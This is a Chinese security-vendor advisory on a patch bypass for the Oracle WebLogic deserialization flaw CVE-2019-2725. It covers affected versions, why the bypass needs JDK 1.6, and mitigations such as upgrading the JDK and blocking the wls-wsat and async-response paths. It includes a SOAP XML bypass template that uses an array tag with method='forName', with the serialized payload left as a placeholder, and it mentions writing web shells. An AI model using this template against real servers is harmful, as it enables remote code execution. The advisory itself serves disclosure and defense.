「漏洞」关于CVE-2019-2725/CNVD-C-2019-48814被绕过补丁的说明

国舜科技

发布时间:06-1703:08

前言

2019年6月14日安全行业内相传CVE-2019-2725补丁被绕过,国舜股份发现后经第一时间确认,证实确实绕过了补丁,由于目前安全圈内关于此漏洞误导较为严重,特写此文以做说明。

受影响版本

Weblogic 10.3.X

JDK 1.6.X

绕过前提

首先,绕过的weblogic版本需要为<=10.3.X系列,JDK<=1.6。因为网传的exp利用方式是替换class标签为array标签配合method.而从JDK1.7开始,array标签根本就没有method这个属性。且Weblogic 12.1.3的启动版本JDK最低需要1.7.网传的exp根本不可能对一个在JDK1.6下连启动都启动不了的12.1.3的Weblogic造成影响。

JDK1.7WithArray Method

JDK1.6WithWeblogic12.1.3

绕过方法

绕过方法已经是公开的秘密,此次绕过使用array配合method属性中的forName方法进行指定调用class。

绕过方法

绕过模板如下

<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/"><java><arraymethod="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>此处拼接之前的byte流</void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>以上模板同时适用于远程加载xml的方式,但已经限定了JDK版本以及Weblogic版本,意义不大。

绕过演示

绕过演示

精心构造的byte流配合补丁绕过可以实现自动识别操作系统、报文回显命令执行、自动找安装路径写shell,危害极为严重。

自动找安装路径写shell

处置建议

1.使用的JDK>8U20,因为8U20及以下有原生反序列化漏洞

2.禁止访问以下路径或者删除以下war包

wls-wsatbea_wls9_async_responsecom.oracle.webservices.wls.wsat-endpoints-impl_12.1.3com.oracle.webservices.wls.bea-wls9-async-response_12.1.3

后记

根据可靠情报,JDK1.7的利用方式已经研制成功,但并未在野利用。再次提醒Weblogic XMLDecoder类漏洞切勿使用打补丁这种方式。因为Oracle是一家使用黑名单的公司,极为容易被绕过。

发现 | 发掘

为随时发生的网安动态发声

资讯|干货|案例|威胁|动态

返回顶部